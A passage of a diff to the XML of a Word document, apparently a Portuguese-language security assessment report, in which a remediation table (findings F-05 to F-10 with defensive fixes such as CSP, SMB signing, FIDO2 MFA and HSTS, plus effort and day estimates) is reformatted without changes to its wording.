-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-05</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5329,17 +5684,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Codificação de saída por contexto, sanitização no servidor e Content-Security-Policy estrita.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Codificação de saída por contexto, sanitização no servidor e Content-Security-Policy estrita.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5351,17 +5707,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Médio</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Médio</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5371,17 +5728,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">7d</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>7d</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5393,20 +5751,27 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">—</w:t>
+              <w:t>—</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:shd w:fill="EA580C" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="EA580C"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5418,17 +5783,18 @@
                 <w:sz w:val="14"/>
                 <w:szCs w:val="14"/>
               </w:rPr>
-              <w:t xml:space="preserve">Curto prazo</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Curto prazo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5438,17 +5804,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-06</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-06</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5458,17 +5825,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Habilitar/forçar SMB signing via GPO e desabilitar NTLM onde possível.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Habilitar/forçar SMB signing via GPO e desabilitar NTLM onde possível.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5480,17 +5848,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Médio</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Médio</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5500,17 +5869,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">10d</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>10d</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5522,20 +5892,27 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">—</w:t>
+              <w:t>—</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:shd w:fill="EA580C" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="EA580C"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5547,17 +5924,18 @@
                 <w:sz w:val="14"/>
                 <w:szCs w:val="14"/>
               </w:rPr>
-              <w:t xml:space="preserve">Curto prazo</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Curto prazo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5567,17 +5945,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-07</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-07</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5587,17 +5966,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Exigir MFA resistente a phishing (FIDO2/WebAuthn) no acesso remoto.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Exigir MFA resistente a phishing (FIDO2/WebAuthn) no acesso remoto.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5609,17 +5989,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Médio</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Médio</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5629,17 +6010,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">14d</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>14d</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5651,20 +6033,27 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">—</w:t>
+              <w:t>—</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:shd w:fill="2563EB" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2563EB"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5676,17 +6065,18 @@
                 <w:sz w:val="14"/>
                 <w:szCs w:val="14"/>
               </w:rPr>
-              <w:t xml:space="preserve">Médio prazo</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Médio prazo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5696,17 +6086,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-08</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-08</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5716,17 +6107,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Adicionar HSTS, CSP e cabeçalhos defensivos; desabilitar suites TLS legadas.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Adicionar HSTS, CSP e cabeçalhos defensivos; desabilitar suites TLS legadas.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5738,17 +6130,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Baixo</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Baixo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5758,17 +6151,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">3d</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>3d</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5780,20 +6174,27 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">—</w:t>
+              <w:t>—</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:shd w:fill="2563EB" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2563EB"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5805,17 +6206,18 @@
                 <w:sz w:val="14"/>
                 <w:szCs w:val="14"/>
               </w:rPr>
-              <w:t xml:space="preserve">Médio prazo</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Médio prazo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5825,17 +6227,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-09</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-09</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5845,17 +6248,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Padronizar respostas de erro genéricas e registrar detalhes apenas no servidor.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Padronizar respostas de erro genéricas e registrar detalhes apenas no servidor.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5867,17 +6271,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Baixo</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Baixo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5887,17 +6292,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">2d</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>2d</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5909,20 +6315,27 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">—</w:t>
+              <w:t>—</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:shd w:fill="2563EB" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2563EB"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5934,17 +6347,18 @@
                 <w:sz w:val="14"/>
                 <w:szCs w:val="14"/>
               </w:rPr>
-              <w:t xml:space="preserve">Médio prazo</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Médio prazo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5954,17 +6368,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-10</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-10</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5974,17 +6389,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
